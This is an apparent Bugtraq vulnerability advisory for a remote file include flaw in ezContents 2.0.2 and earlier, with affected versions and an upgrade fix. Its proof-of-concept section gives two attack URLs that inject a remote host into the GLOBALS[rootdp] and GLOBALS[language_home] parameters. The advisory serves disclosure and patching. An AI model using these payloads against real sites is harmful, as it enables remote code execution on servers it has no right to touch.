VisualShapers ezContents Multiple Module File Include Vulnerability
BID:9638
Info
VisualShapers ezContents Multiple Module File Include Vulnerability
| Bugtraq ID: | 9638 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0132 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | The disclosure of this issue has been credited to Cedric Cochin <[email protected]>. |
| Vulnerable: |
VisualShapers ezContents 2.0.2 VisualShapers ezContents 2.0.1 VisualShapers ezContents 2.0 rc3 VisualShapers ezContents 2.0 rc2 VisualShapers ezContents 2.0 rc1 VisualShapers ezContents 1.45 b VisualShapers ezContents 1.44 VisualShapers ezContents 1.43 VisualShapers ezContents 1.42 VisualShapers ezContents 1.41 VisualShapers ezContents 1.40 VisualShapers ezContents 1.4.5 |
| Not Vulnerable: |
VisualShapers ezContents 2.0.3 |
Discussion
VisualShapers ezContents Multiple Module File Include Vulnerability
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
Exploit / POC
VisualShapers ezContents Multiple Module File Include Vulnerability
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents
No exploit is required.
The following proof of concept has been provided:
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents
Solution / Fix
VisualShapers ezContents Multiple Module File Include Vulnerability
Solution:
The vendor has released ezContents 2.0.3 to address this issue. Users are advised to upgrade to the fixed version.
VisualShapers ezContents 1.4.5
VisualShapers ezContents 1.40
VisualShapers ezContents 1.41
VisualShapers ezContents 1.42
VisualShapers ezContents 1.43
VisualShapers ezContents 1.44
VisualShapers ezContents 1.45 b
VisualShapers ezContents 2.0 rc2
VisualShapers ezContents 2.0 rc3
VisualShapers ezContents 2.0 rc1
VisualShapers ezContents 2.0.1
VisualShapers ezContents 2.0.2
Solution:
The vendor has released ezContents 2.0.3 to address this issue. Users are advised to upgrade to the fixed version.
VisualShapers ezContents 1.4.5
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 1.40
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 1.41
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 1.42
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 1.43
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 1.44
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 1.45 b
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 2.0 rc2
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 2.0 rc3
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 2.0 rc1
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 2.0.1
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
VisualShapers ezContents 2.0.2
-
VisualShapers ezContents203.tar.gz
http://www.ezcontentsdev.org/ezContents203.tar.gz
References
VisualShapers ezContents Multiple Module File Include Vulnerability
References:
References:
- Home Page (VisualShapers)
- PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior (Cedric Cochin
)